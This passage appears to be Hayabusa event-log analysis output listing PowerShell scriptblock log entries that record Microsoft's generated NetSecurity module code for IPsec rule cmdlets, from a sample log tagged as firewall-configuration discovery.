($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; 
ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( 
[Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact 
($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = 
${PassThru} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeRule ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' function Get-NetIPsecMainModeRule { 
[CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, 